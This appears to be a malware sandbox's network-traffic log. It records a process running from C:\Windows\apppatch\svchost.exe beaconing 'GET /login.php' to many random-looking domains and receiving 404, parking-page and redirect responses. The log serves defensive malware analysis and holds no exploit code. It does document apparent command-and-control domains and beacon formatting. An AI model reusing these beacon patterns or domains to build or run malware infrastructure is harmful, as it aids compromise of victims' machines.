Nov 11, 2024 18:13:13.807904959 CET	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:13 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:13:13.858683109 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Nov 11, 2024 18:13:14.143414021 CET	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:14 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:13:36.170813084 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Nov 11, 2024 18:13:36.456219912 CET	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:36 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:13:37.077326059 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Nov 11, 2024 18:13:37.362814903 CET	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:13:37 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	62038	103.224.182.252	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:13.154115915 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
Nov 11, 2024 18:13:13.737201929 CET	338	IN	HTTP/1.1 302 Found date: Mon, 11 Nov 2024 17:13:13 GMT server: Apache set-cookie: __tad=1731345193.3163760; expires=Thu, 09-Nov-2034 17:13:13 GMT; Max-Age=315360000 location: http://ww16.vofycot.com/login.php?sub1=20241112-0413-1304-9c25-d9b9aac71030 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	62050	199.59.243.227	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:13.888042927 CET	350	OUT	GET /login.php?subid1=20241112-0413-1393-8b92-799b17a46fa8 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731345193.2353053
Nov 11, 2024 18:13:14.313991070 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:13 GMT content-type: text/html; charset=utf-8 content-length: 1230 x-request-id: 420ef3a8-c938-4e4a-99bb-1a08a10d1764 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Cv4wKf2H8VZiKuMzPNno6p1KNNMJH3Dw3bPkuWqU7DW5lPnILUx1f3TjiFNhJg6KRZIrewXvg55vjxnwnDGm8g== set-cookie: parking_session=420ef3a8-c938-4e4a-99bb-1a08a10d1764; expires=Mon, 11 Nov 2024 17:28:14 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 76 34 77 4b 66 32 48 38 56 5a 69 4b 75 4d 7a 50 4e 6e 6f 36 70 31 4b 4e 4e 4d 4a 48 33 44 77 33 62 50 6b 75 57 71 55 37 44 57 35 6c 50 6e 49 4c 55 78 31 66 33 54 6a 69 46 4e 68 4a 67 36 4b 52 5a 49 72 65 77 58 76 67 35 35 76 6a 78 6e 77 6e 44 47 6d 38 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Cv4wKf2H8VZiKuMzPNno6p1KNNMJH3Dw3bPkuWqU7DW5lPnILUx1f3TjiFNhJg6KRZIrewXvg55vjxnwnDGm8g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:13:14.314696074 CET	664	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDIwZWYzYTgtYzkzOC00ZTRhLTk5YmItMWEwOGExMGQxNzY0IiwicGFnZV90aW1lIjoxNzMxMzQ1MTk0LCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	62052	64.190.63.136	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:14.117108107 CET	348	OUT	GET /login.php?sub1=20241112-0413-1304-9c25-d9b9aac71030 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731345193.3163760
Nov 11, 2024 18:13:14.807411909 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:14 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_SrXOcW51mwGTH+KK7GWmjp6Tooz4B48oYzKrJ7EOZfZ6jQvZXMkk4u9uKF5QvAVJuK2JZquBsvc+iF81sBEbDA== last-modified: Mon, 11 Nov 2024 17:13:14 GMT x-cache-miss-from: parking-7596689c44-4sqbl server: Parking/1.0 Data Raw: 44 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 53 72 58 4f 63 57 35 31 6d 77 47 54 48 2b 4b 4b 37 47 57 6d 6a 70 36 54 6f 6f 7a 34 42 34 38 6f 59 7a 4b 72 4a 37 45 4f 5a 66 5a 36 6a 51 76 5a 58 4d 6b 6b 34 75 39 75 4b 46 35 51 76 41 56 4a 75 4b 32 4a 5a 71 75 42 73 76 63 2b 69 46 38 31 73 42 45 62 44 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED] Data Ascii: DCE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_SrXOcW51mwGTH+KK7GWmjp6Tooz4B48oYzKrJ7EOZfZ6jQvZXMkk4u9uKF5QvAVJuK2JZquBsvc+iF81sBEbDA==><head><meta charset="utf-8"><title>vofycot.com - This website is for sale! - vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
Nov 11, 2024 18:13:14.807436943 CET	1236	IN	Data Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png
Nov 11, 2024 18:13:14.807451963 CET	1236	IN	Data Raw: 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f Data Ascii: ine-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}butt
Nov 11, 2024 18:13:14.807465076 CET	1236	IN	Data Raw: 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c Data Ascii: nt:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcemen
Nov 11, 2024 18:13:14.807477951 CET	1236	IN	Data Raw: 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 Data Ascii: t-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__cont
Nov 11, 2024 18:13:14.807491064 CET	1236	IN	Data Raw: 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 Data Ascii: p:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .
Nov 11, 2024 18:13:14.807503939 CET	1236	IN	Data Raw: 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 Data Ascii: r:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:me
Nov 11, 2024 18:13:14.807517052 CET	1236	IN	Data Raw: 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a Data Ascii: slateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-ri
Nov 11, 2024 18:13:14.807532072 CET	1236	IN	Data Raw: 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 Data Ascii: m:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:720px}.co
Nov 11, 2024 18:13:14.807547092 CET	1236	IN	Data Raw: 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 Data Ascii: -block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;f
Nov 11, 2024 18:13:14.812423944 CET	1236	IN	Data Raw: 5a 71 75 42 73 76 63 2b 69 46 38 31 73 42 45 62 44 41 3d 3d 22 2c 22 74 69 64 22 3a 22 33 30 39 37 22 2c 22 62 75 79 62 6f 78 22 3a 74 72 75 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 64 69 73 63 6c 61 69 6d 65 72 22 3a 74 Data Ascii: ZquBsvc+iF81sBEbDA==","tid":"3097","buybox":true,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"https://sedo.com/search/details/?partnerid=14460&langua

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	61112	64.225.91.73	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:15.852260113 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Nov 11, 2024 18:13:16.408402920 CET	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Mon, 11 Nov 2024 17:13:16 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	55436	72.52.179.174	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:16.146435022 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	55442	72.52.179.174	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:16.680766106 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	52002	52.34.198.229	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:19.921906948 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Nov 11, 2024 18:13:20.604234934 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5401e2757479bd0d46a1094e43cf9318\|66.23.206.109\|1731345200\|1731345200\|0\|1\|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	55368	44.221.84.105	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:22.885515928 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Nov 11, 2024 18:13:23.313640118 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c957dca55633865f1d611bb4af3e7869\|66.23.206.109\|1731345203\|1731345203\|0\|1\|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	63292	99.83.170.3	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:24.633200884 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Nov 11, 2024 18:13:25.072573900 CET	166	IN	HTTP/1.1 308 Permanent Redirect Connection: close Location: https://puzylyp.com/login.php Server: Caddy Date: Mon, 11 Nov 2024 17:13:25 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	63294	23.253.46.64	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:24.744457960 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
